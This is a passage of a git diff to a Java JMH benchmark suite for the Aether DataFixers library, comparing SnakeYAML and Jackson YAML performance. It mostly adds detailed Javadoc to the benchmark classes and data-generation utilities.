- * JMH benchmark comparing SnakeYAML and Jackson YAML performance.
+ * JMH benchmark comparing YAML DynamicOps implementations: SnakeYAML vs Jackson YAML.
*
- *
Measures DynamicOps operations and migration performance for both
- * YAML implementations.
+ *
This benchmark measures the performance of YAML-based operations using two
+ * different underlying libraries: SnakeYAML ({@link SnakeYamlOps}) and Jackson YAML
+ * ({@link JacksonYamlOps}). YAML is commonly used for configuration files and
+ * human-readable data serialization.
+ *
+ *
Benchmark Categories
+ *
+ *
Data Generation
+ *
Measure Dynamic object construction performance:
+ *
+ *
{@link #snakeYamlGenerate} - Create Dynamic using SnakeYamlOps
+ *
{@link #jacksonYamlGenerate} - Create Dynamic using JacksonYamlOps
+ *
+ *
+ *
Field Access
+ *
Measure field read operations on existing data:
+ *
+ *
{@link #snakeYamlFieldRead} - Read field from SnakeYAML-backed Dynamic
+ *
{@link #jacksonYamlFieldRead} - Read field from Jackson YAML-backed Dynamic
+ *
+ *
+ *
Field Modification
+ *
Measure field write/set operations:
+ *
+ *
{@link #snakeYamlFieldSet} - Set field on SnakeYAML-backed Dynamic
+ *
{@link #jacksonYamlFieldSet} - Set field on Jackson YAML-backed Dynamic
+ *
+ *
+ *
Migration
+ *
Measure DataFixer migration performance:
+ *
+ *
{@link #snakeYamlMigration} - Apply fix to SnakeYAML-backed data
+ *
{@link #jacksonYamlMigration} - Apply fix to Jackson YAML-backed data
+ *
+ *
+ *
Implementations Compared
+ *
+ *
Implementation
Library
Node Type
Characteristics
+ *
+ *
{@link SnakeYamlOps}
+ *
SnakeYAML
+ *
{@code Object} (native Java types)
+ *
Native YAML library, uses Maps/Lists, anchors & aliases support
+ *
+ *
+ *
{@link JacksonYamlOps}
+ *
Jackson Dataformat YAML
+ *
{@code JsonNode}
+ *
Unified Jackson API, shares code with JSON, streaming support
+ *
+ *
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
payloadSize
SMALL, MEDIUM, LARGE
Test data complexity
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Microseconds
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run all YAML benchmarks
+ * java -jar benchmarks.jar YamlBenchmark
+ *
+ * # Compare only generation performance
+ * java -jar benchmarks.jar "YamlBenchmark.*Generate"
+ *
+ * # Run SnakeYAML-only benchmarks
+ * java -jar benchmarks.jar "YamlBenchmark.snakeYaml.*"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar YamlBenchmark -p payloadSize=MEDIUM
+ * }
*
* @author Erik Pförtner
+ * @see JsonBenchmark
+ * @see TomlXmlBenchmark
+ * @see CrossFormatBenchmark
+ * @see de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps
+ * @see de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -64,104 +149,176 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class YamlBenchmark {
+ /**
+ * Field name used for read/write benchmarks.
+ *
+ *
References the first string field generated by {@link BenchmarkDataGenerator}.
+ */
+ private static final String FIELD_NAME = "stringField0";
+
+ /**
+ * Payload size parameter controlling test data complexity.
+ *
+ *
Injected by JMH to run benchmarks across different data sizes.
+ */
@Param({"SMALL", "MEDIUM", "LARGE"})
private PayloadSize payloadSize;
+ /**
+ * SnakeYAML DynamicOps implementation using native Java types.
+ */
+ private SnakeYamlOps snakeOps;
+
+ /**
+ * Jackson YAML DynamicOps implementation using JsonNode.
+ */
+ private JacksonYamlOps jacksonOps;
+
+ /**
+ * Pre-generated test data using SnakeYAML.
+ */
private Dynamic snakeYamlData;
+
+ /**
+ * Pre-generated test data using Jackson YAML.
+ */
private Dynamic jacksonYamlData;
+
+ /**
+ * DataFixer for migration benchmarks.
+ */
private DataFixer fixer;
+
+ /**
+ * Source version for migrations (v1).
+ */
private DataVersion fromVersion;
+
+ /**
+ * Target version for migrations (v2).
+ */
private DataVersion toVersion;
+ /**
+ * Initializes DynamicOps instances, test data, and DataFixer.
+ *
+ *
Both SnakeYAML and Jackson YAML data are pre-generated to isolate
+ * benchmark measurements from data creation overhead.
Measures the time to create a complete test data structure using
+ * SnakeYAML's native Java type representation (Maps and Lists).
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- SnakeYamlOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.snakeOps, this.payloadSize);
blackhole.consume(data);
}
/**
- * Benchmarks Jackson YAML data generation.
+ * Benchmarks Dynamic object generation using JacksonYamlOps.
+ *
+ *
Measures the time to create a complete test data structure using
+ * Jackson's JsonNode representation for YAML.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- JacksonYamlOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize);
blackhole.consume(data);
}
- // ==================== Field Access ====================
+ // ==================== Field Access Benchmarks ====================
/**
- * Benchmarks SnakeYAML field read access.
+ * Benchmarks field read access on SnakeYAML-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * SnakeYAML-based Dynamic object (backed by Java Map).
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.snakeYamlData.get("stringField0");
+ final Dynamic field = this.snakeYamlData.get(FIELD_NAME);
blackhole.consume(field);
}
/**
- * Benchmarks Jackson YAML field read access.
+ * Benchmarks field read access on Jackson YAML-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * Jackson YAML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.jacksonYamlData.get("stringField0");
+ final Dynamic field = this.jacksonYamlData.get(FIELD_NAME);
blackhole.consume(field);
}
- // ==================== Field Modification ====================
+ // ==================== Field Modification Benchmarks ====================
/**
- * Benchmarks SnakeYAML field set operation.
+ * Benchmarks field set operation on SnakeYAML-backed Dynamic.
+ *
+ *
Measures the time to add a new field to a SnakeYAML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlFieldSet(final Blackhole blackhole) {
final Dynamic result = this.snakeYamlData.set(
- "newField", this.snakeYamlData.createString("newValue"));
+ "newField",
+ this.snakeYamlData.createString("newValue")
+ );
blackhole.consume(result);
}
/**
- * Benchmarks Jackson YAML field set operation.
+ * Benchmarks field set operation on Jackson YAML-backed Dynamic.
+ *
+ *
Measures the time to add a new field to a Jackson YAML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlFieldSet(final Blackhole blackhole) {
final Dynamic result = this.jacksonYamlData.set(
- "newField", this.jacksonYamlData.createString("newValue"));
+ "newField",
+ this.jacksonYamlData.createString("newValue")
+ );
blackhole.consume(result);
}
- // ==================== Migration ====================
+ // ==================== Migration Benchmarks ====================
/**
- * Benchmarks migration with SnakeYAML DynamicOps.
+ * Benchmarks DataFixer migration on SnakeYAML-backed data.
+ *
+ *
Measures the time to apply a single fix migration to SnakeYAML-based
+ * Dynamic data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -171,12 +328,16 @@ public void snakeYamlMigration(final Blackhole blackhole) {
BenchmarkBootstrap.BENCHMARK_TYPE,
this.snakeYamlData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks migration with Jackson YAML DynamicOps.
+ * Benchmarks DataFixer migration on Jackson YAML-backed data.
+ *
+ *
Measures the time to apply a single fix migration to Jackson YAML-based
+ * Dynamic data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -186,7 +347,8 @@ public void jacksonYamlMigration(final Blackhole blackhole) {
BenchmarkBootstrap.BENCHMARK_TYPE,
this.jacksonYamlData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java
new file mode 100644
index 0000000..d2c5b40
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java
@@ -0,0 +1,158 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Format-focused JMH benchmarks comparing DynamicOps implementations in the Aether DataFixers framework.
+ *
+ *
This package contains benchmarks that compare the performance of different serialization
+ * format implementations. These benchmarks help users choose the optimal DynamicOps implementation
+ * for their specific use case based on empirical performance data.
Each format benchmark measures the following operations:
+ *
+ *
Data Generation: Time to create Dynamic objects from scratch
+ *
Field Read: Time to retrieve a single field from existing data
+ *
Field Set: Time to add/modify a field (creates new immutable structure)
+ *
Migration: Time to apply a DataFix to format-specific data
+ *
+ *
+ *
Running Format Benchmarks
+ *
{@code
+ * # Run all format benchmarks
+ * java -jar benchmarks.jar ".*format.*"
+ *
+ * # Run specific format benchmark
+ * java -jar benchmarks.jar JsonBenchmark
+ * java -jar benchmarks.jar YamlBenchmark
+ * java -jar benchmarks.jar TomlXmlBenchmark
+ * java -jar benchmarks.jar CrossFormatBenchmark
+ *
+ * # Run all JSON-related benchmarks
+ * java -jar benchmarks.jar ".*Json.*"
+ *
+ * # Run generation benchmarks across all formats
+ * java -jar benchmarks.jar ".*Benchmark.*Generate"
+ *
+ * # Run migration benchmarks across all formats
+ * java -jar benchmarks.jar ".*Benchmark.*Migration"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar ".*format.*" -p payloadSize=MEDIUM
+ * }
+ *
+ *
Choosing a DynamicOps Implementation
+ *
Use these benchmark results to guide implementation selection:
+ *
+ *
Scenario
Recommended
Rationale
+ *
+ *
General JSON processing
+ *
GsonOps or JacksonJsonOps
+ *
Compare benchmarks; both are mature and fast
+ *
+ *
+ *
Configuration files (YAML)
+ *
SnakeYamlOps
+ *
Native YAML features (anchors, aliases)
+ *
+ *
+ *
Mixed Jackson ecosystem
+ *
JacksonJsonOps/JacksonYamlOps
+ *
Shared code, faster cross-format conversion
+ *
+ *
+ *
TOML configuration
+ *
JacksonTomlOps
+ *
Only TOML option; good for Rust interop
+ *
+ *
+ *
Legacy XML systems
+ *
JacksonXmlOps
+ *
Only XML option; document format support
+ *
+ *
+ *
+ *
Cross-Format Conversion
+ *
The {@link de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark}
+ * measures conversion overhead between formats. Key insights:
+ *
+ *
Same-ecosystem: Jackson JSON ↔ Jackson YAML is fastest (shared JsonNode)
+ *
Cross-ecosystem: Gson ↔ SnakeYAML requires full tree traversal
+ *
Asymmetry: A→B may differ from B→A due to construction costs
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Throughput: Higher ops/sec is better for high-volume scenarios
+ *
Average time: Lower latency is better for interactive applications
+ *
Scaling: Compare SMALL vs MEDIUM vs LARGE to understand data volume impact
+ *
Variance: High ± values may indicate GC sensitivity or JIT instability
+ *
+ *
+ * @see de.splatgames.aether.datafixers.benchmarks.format.JsonBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.format.YamlBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.format.TomlXmlBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark
+ * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps
+ * @since 1.0.0
+ */
+package de.splatgames.aether.datafixers.benchmarks.format;
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java
new file mode 100644
index 0000000..be94d9b
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java
@@ -0,0 +1,191 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * JMH benchmark suite for the Aether DataFixers framework.
+ *
+ *
This package and its sub-packages provide comprehensive performance benchmarks
+ * for all major components of the Aether DataFixers system. The benchmarks use
+ * JMH (Java Microbenchmark Harness)
+ * for accurate, reliable performance measurements.
Creates fixers with varying numbers of fixes to measure migration
- * chain performance. All fixes use {@link NoOpDataFixerContext} to minimize
- * logging overhead during benchmarks.
+ *
This utility class provides various DataFixer configurations for measuring
+ * different aspects of migration performance. All created fixers use {@link NoOpDataFixerContext} to eliminate logging
+ * overhead during benchmark measurements.
+ *
+ *
Available Fixer Configurations
+ *
+ *
Method
Fix Count
Fix Types
Use Case
+ *
+ *
{@link #createSingleFixFixer()}
+ *
1
+ *
Rename
+ *
Baseline single-operation performance
+ *
+ *
+ *
{@link #createIdentityFixer()}
+ *
1
+ *
Identity (no-op)
+ *
Framework overhead measurement
+ *
+ *
+ *
{@link #createChainFixer(int)}
+ *
1-100
+ *
Rename (homogeneous)
+ *
Chain length scaling analysis
+ *
+ *
+ *
{@link #createMixedFixer(int)}
+ *
4+
+ *
Rename, Add, Remove, Transform
+ *
Realistic migration scenarios
+ *
+ *
+ *
{@link #createPlayerFixer()}
+ *
4
+ *
Mixed (realistic)
+ *
Domain-specific migration testing
+ *
+ *
+ *
+ *
Type References
+ *
Two type references are provided for categorizing benchmark data:
+ *
+ *
{@link #BENCHMARK_TYPE} - Generic benchmark data (used by most benchmarks)
+ *
{@link #PLAYER_TYPE} - Player-like data structures (for domain-specific tests)
+ *
+ *
+ *
Design Considerations
+ *
+ *
No-op context: All fixers use {@link NoOpDataFixerContext} to prevent
+ * logging from affecting benchmark measurements
+ *
GsonOps: All fixes use {@link GsonOps} as the reference DynamicOps
+ * implementation for consistency
+ *
Testkit integration: Uses {@link QuickFix} from the testkit module
+ * for efficient fix creation
*
* @author Erik Pförtner
+ * @see BenchmarkDataGenerator
+ * @see PayloadSize
+ * @see de.splatgames.aether.datafixers.testkit.factory.QuickFix
* @since 1.0.0
*/
public final class BenchmarkBootstrap {
/**
- * Type reference for benchmark data.
+ * Type reference for generic benchmark data.
+ *
+ *
Used by most benchmarks as the default type for test data. The type
+ * name "benchmark" is intentionally generic to avoid confusion with domain-specific types.
*/
public static final TypeReference BENCHMARK_TYPE = new TypeReference("benchmark");
/**
* Type reference for player-like benchmark data.
+ *
+ *
Used by benchmarks that simulate game player data migrations,
+ * providing a realistic domain-specific testing scenario.
+ *
+ * @see #createPlayerFixer()
+ * @see BenchmarkDataGenerator#generatePlayerData(DynamicOps)
*/
public static final TypeReference PLAYER_TYPE = new TypeReference("player");
+ /**
+ * Private constructor to prevent instantiation.
+ */
private BenchmarkBootstrap() {
// Utility class
}
/**
- * Creates a DataFixer with a single rename field fix.
+ * Creates a DataFixer with a single field rename fix (v1 → v2).
+ *
+ *
This is the simplest non-trivial fixer configuration, useful for
+ * measuring baseline single-operation performance. The fix renames a field from "oldName" to "newName".
+ *
+ *
Version mapping: v1 → v2 (single step)
*
* @return a new DataFixer configured for single-fix benchmarks
+ * @see #createIdentityFixer()
*/
@NotNull
public static DataFixer createSingleFixFixer() {
@@ -79,10 +173,22 @@ public static DataFixer createSingleFixFixer() {
/**
* Creates a DataFixer with an identity fix (no-op transformation).
*
- *
Useful as a baseline to measure framework overhead without
- * actual data transformation.
+ *
The identity fixer passes data through without modification, useful for
+ * measuring pure framework overhead including:
+ *
+ *
Version checking and fix selection
+ *
Dynamic wrapper creation and manipulation
+ *
DataResult monad operations
+ *
Type reference resolution
+ *
+ *
+ *
Comparing identity fixer performance against {@link #createSingleFixFixer()}
+ * reveals the actual cost of field operations versus framework overhead.
*
- * @return a new DataFixer with identity fix
+ *
Version mapping: v1 → v2 (no data changes)
+ *
+ * @return a new DataFixer with an identity (pass-through) fix
+ * @see #createSingleFixFixer()
*/
@NotNull
public static DataFixer createIdentityFixer() {
@@ -93,14 +199,29 @@ public static DataFixer createIdentityFixer() {
}
/**
- * Creates a DataFixer with a chain of sequential fixes.
+ * Creates a DataFixer with a chain of sequential homogeneous fixes.
+ *
+ *
Each fix in the chain performs a field rename operation (field1 → field2,
+ * field2 → field3, etc.), simulating migration scenarios with multiple consecutive version upgrades. This
+ * configuration is ideal for measuring how migration performance scales with chain length.
*
- *
Each fix in the chain performs a field rename operation,
- * simulating real-world migration scenarios with multiple version upgrades.
*
- * @param fixCount the number of fixes in the chain (1 to 100)
- * @return a new DataFixer with the specified number of fixes
+ *
Typical Parameter Values for Benchmarks
+ *
+ *
fixCount
Scenario
+ *
1
Baseline (compare with {@link #createSingleFixFixer()})
+ *
5
Short chain (minor version updates)
+ *
10
Medium chain (typical upgrade path)
+ *
25
Long chain (significant version gap)
+ *
50
Stress test (extended migration)
+ *
100
Maximum supported (extreme case)
+ *
+ *
+ * @param fixCount the number of fixes in the chain (must be between 1 and 100 inclusive)
+ * @return a new DataFixer with the specified number of sequential rename fixes
* @throws IllegalArgumentException if fixCount is less than 1 or greater than 100
+ * @see #createMixedFixer(int)
*/
@NotNull
public static DataFixer createChainFixer(final int fixCount) {
@@ -126,13 +247,29 @@ public static DataFixer createChainFixer(final int fixCount) {
}
/**
- * Creates a DataFixer with mixed fix types for realistic benchmarking.
+ * Creates a DataFixer with mixed heterogeneous fix types for realistic benchmarking.
+ *
+ *
Unlike {@link #createChainFixer(int)} which uses only rename operations,
+ * this method creates a chain with rotating fix types that more accurately represent real-world migration
+ * scenarios:
*
- *
Includes rename, add field, remove field, and transform operations
- * to simulate a realistic migration chain.
+ *
+ *
Position (mod 4)
Fix Type
Operation
+ *
0
Rename
Renames a field
+ *
1
Add
Adds a new string field with default value
+ *
2
Remove
Removes a field
+ *
3
Transform
Transforms field value (string concatenation)
+ *
*
- * @param fixCount the number of fixes in the chain (must be >= 4)
- * @return a new DataFixer with mixed fix types
+ *
Comparing mixed fixer performance against chain fixer performance
+ * reveals the relative cost of different fix operations.
+ *
+ * @param fixCount the number of fixes in the chain (must be at least 4 to include all fix types)
+ * @return a new DataFixer with mixed fix types cycling through rename, add, remove, and transform operations
+ * @throws IllegalArgumentException if fixCount is less than 4
+ * @see #createChainFixer(int)
*/
@NotNull
public static DataFixer createMixedFixer(final int fixCount) {
@@ -156,7 +293,23 @@ public static DataFixer createMixedFixer(final int fixCount) {
/**
* Creates a DataFixer for player data migration benchmarks.
*
- * @return a new DataFixer configured for player data
+ *
This fixer simulates a realistic game player data migration scenario
+ * with four sequential fixes representing typical schema evolution:
+ *
+ *
+ *
Version
Fix
Description
+ *
v1 → v2
Rename
{@code name} → {@code playerName}
+ *
v2 → v3
Add
Add {@code score} field (default: 0)
+ *
v3 → v4
Transform
Double the {@code level} value
+ *
v4 → v5
Remove
Remove {@code tempField}
+ *
+ *
+ *
Use with {@link BenchmarkDataGenerator#generatePlayerData(DynamicOps)} for
+ * complete domain-specific migration testing.
+ *
+ * @return a new DataFixer configured for player data migrations (v1 → v5)
+ * @see #PLAYER_TYPE
+ * @see BenchmarkDataGenerator#generatePlayerData(DynamicOps)
*/
@NotNull
public static DataFixer createPlayerFixer() {
@@ -178,11 +331,20 @@ public static DataFixer createPlayerFixer() {
.build();
}
- private static DataFix createMixedFix(
- final int fromVersion,
- final int toVersion,
- final int fixType
- ) {
+ /**
+ * Creates a specific fix type based on the fixType selector.
+ *
+ *
Internal factory method used by {@link #createMixedFixer(int)} to create
+ * different fix types in a rotating pattern.
+ *
+ * @param fromVersion the source version for the fix
+ * @param toVersion the target version for the fix
+ * @param fixType the fix type selector (0=rename, 1=add, 2=remove, 3=transform)
+ * @return a DataFix of the specified type
+ */
+ private static DataFix createMixedFix(final int fromVersion,
+ final int toVersion,
+ final int fixType) {
return switch (fixType) {
case 0 -> QuickFix.renameField(
GsonOps.INSTANCE,
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
index 7f48696..e3b635e 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
@@ -29,41 +29,125 @@
import org.jetbrains.annotations.NotNull;
/**
- * Utility class for generating benchmark test data.
+ * Factory for generating benchmark test data with configurable complexity.
*
- *
Generates {@link Dynamic} objects with configurable complexity based on
- * {@link PayloadSize} settings. Uses the testkit's {@link TestDataBuilder}
- * for efficient, format-agnostic data construction.
+ *
This utility class creates {@link Dynamic} objects of varying sizes and
+ * structures for use in JMH benchmarks. Data generation is format-agnostic, working with any {@link DynamicOps}
+ * implementation.
+ *
+ *
Data Generation Methods
+ *
+ *
Method
Structure
Use Case
+ *
+ *
{@link #generate(DynamicOps, PayloadSize)}
+ *
Complex (fields + nesting + lists)
+ *
General-purpose benchmarks
+ *
+ *
+ *
{@link #generatePlayerData(DynamicOps)}
+ *
Domain-specific (player data)
+ *
Realistic migration scenarios
+ *
+ *
+ *
{@link #generateFlat(DynamicOps, int)}
+ *
Flat object (fields only)
+ *
Basic operation benchmarks
+ *
+ *
+ *
+ *
Generated Data Structure
+ *
The main {@link #generate(DynamicOps, PayloadSize)} method creates objects with:
Testkit integration: Uses {@link TestDataBuilder} for fluent,
+ * type-safe data construction
+ *
Format agnostic: Works with any DynamicOps (Gson, Jackson, YAML, etc.)
+ *
Deterministic: Generated data is reproducible for benchmark consistency
+ * (except timestamp fields)
+ *
Configurable complexity: {@link PayloadSize} controls data volume
+ *
+ *
+ *
Usage Example
+ *
{@code
+ * // In a JMH benchmark
+ * @Setup(Level.Iteration)
+ * public void setup() {
+ * // Generate medium-complexity test data
+ * this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);
+ *
+ * // Or generate player-specific data
+ * this.playerData = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
+ * }
+ * }
*
* @author Erik Pförtner
+ * @see PayloadSize
+ * @see BenchmarkBootstrap
+ * @see de.splatgames.aether.datafixers.testkit.TestDataBuilder
* @since 1.0.0
*/
public final class BenchmarkDataGenerator {
+ /**
+ * Private constructor to prevent instantiation.
+ */
private BenchmarkDataGenerator() {
// Utility class
}
/**
- * Generates benchmark data with the specified payload size.
+ * Generates benchmark data with the specified payload size and complexity.
*
- *
Creates a complex object structure including:
+ *
Creates a complex object structure including:
*
- *
Primitive fields (strings, integers, booleans)
- *
Nested objects up to the configured depth
- *
A list with the configured number of items
+ *
Primitive fields: String, integer, and boolean fields based on
+ * {@link PayloadSize#getFieldCount()}
+ *
Nested objects: Recursive nesting up to
+ * {@link PayloadSize#getNestingDepth()} levels
+ *
List with items: An "items" array with
+ * {@link PayloadSize#getListSize()} objects
*
*
- * @param ops the DynamicOps to use for data creation
- * @param size the payload size configuration
- * @param the underlying value type
- * @return a new Dynamic containing the generated data
+ *
Field Naming Patterns
+ *
+ *
Field Type
Pattern
Example
+ *
String
{@code stringFieldN}
{@code stringField0: "value0"}
+ *
Integer
{@code intFieldN}
{@code intField0: 0}
+ *
Boolean
{@code boolFieldN}
{@code boolField0: true}
+ *
+ *
+ * @param ops the DynamicOps implementation to use for data creation
+ * @param size the payload size configuration controlling data complexity
+ * @param the underlying value type of the DynamicOps
+ * @return a new Dynamic containing the generated benchmark data
*/
@NotNull
- public static Dynamic generate(
- @NotNull final DynamicOps ops,
- @NotNull final PayloadSize size
- ) {
+ public static Dynamic generate(@NotNull final DynamicOps ops,
+ @NotNull final PayloadSize size) {
final TestDataBuilder builder = TestData.using(ops).object();
// Add primitive fields
@@ -93,18 +177,39 @@ public static Dynamic generate(
/**
* Generates a player-like data structure for realistic migration benchmarks.
*
- *
Creates a structure similar to game player data with:
- *
- *
Identity fields (id, name)
- *
Stats (level, experience, health)
- *
Position object (x, y, z, world)
- *
Inventory list
- *
Achievements list
- *
+ *
Creates a structure simulating game player data, useful for domain-specific
+ * migration testing with {@link BenchmarkBootstrap#createPlayerFixer()}.
*
- * @param ops the DynamicOps to use for data creation
- * @param the underlying value type
- * @return a new Dynamic containing player-like data
+ *
Data Characteristics
+ *
+ *
Component
Count
Description
+ *
Top-level fields
6
id, name, level, experience, health, active
+ *
Nested objects
2
position (4 fields), stats (4 fields)
+ *
Inventory slots
36
Standard inventory size
+ *
Achievements
6
String list
+ *
+ *
+ * @param ops the DynamicOps implementation to use for data creation
+ * @param the underlying value type of the DynamicOps
+ * @return a new Dynamic containing player-like benchmark data
+ * @see BenchmarkBootstrap#createPlayerFixer()
+ * @see BenchmarkBootstrap#PLAYER_TYPE
*/
@NotNull
public static Dynamic generatePlayerData(@NotNull final DynamicOps ops) {
@@ -147,18 +252,32 @@ public static Dynamic generatePlayerData(@NotNull final DynamicOps ops
}
/**
- * Generates a simple flat object for basic operation benchmarks.
+ * Generates a simple flat object with only string fields.
+ *
+ *
Creates a minimal object structure without nesting or lists, useful for
+ * benchmarking basic field access and manipulation operations with minimal traversal overhead.
*
- * @param ops the DynamicOps to use for data creation
- * @param fieldCount the number of fields to generate
- * @param the underlying value type
- * @return a new Dynamic containing flat data
+ *
This method is useful for isolating field operation costs from
+ * structural complexity overhead.
+ *
+ * @param ops the DynamicOps implementation to use for data creation
+ * @param fieldCount the number of string fields to generate (field0 through field(n-1))
+ * @param the underlying value type of the DynamicOps
+ * @return a new Dynamic containing a flat object with string fields
*/
@NotNull
- public static Dynamic generateFlat(
- @NotNull final DynamicOps ops,
- final int fieldCount
- ) {
+ public static Dynamic generateFlat(@NotNull final DynamicOps ops,
+ final int fieldCount) {
final TestDataBuilder builder = TestData.using(ops).object();
for (int i = 0; i < fieldCount; i++) {
builder.put("field" + i, "value" + i);
@@ -166,11 +285,25 @@ public static Dynamic generateFlat(
return builder.build();
}
- private static void addNestedObject(
- final TestDataBuilder builder,
- final String key,
- final int depth
- ) {
+ /**
+ * Recursively adds nested object structures to the builder.
+ *
+ *
Creates a chain of nested objects, each containing:
+ *
+ *
{@code level} - the current nesting depth
+ *
{@code data} - a string identifying the nesting level
+ *
{@code timestamp} - current system time (for data variation)
+ *
{@code child} - the next nested level (if depth > 0)
+ *
+ *
+ * @param builder the TestDataBuilder to add the nested structure to
+ * @param key the field name for this nested object
+ * @param depth remaining nesting levels (stops when depth reaches 0)
+ * @param the underlying value type of the builder
+ */
+ private static void addNestedObject(final TestDataBuilder builder,
+ final String key,
+ final int depth) {
if (depth <= 0) {
return;
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
index 82fe8a3..13b56f3 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
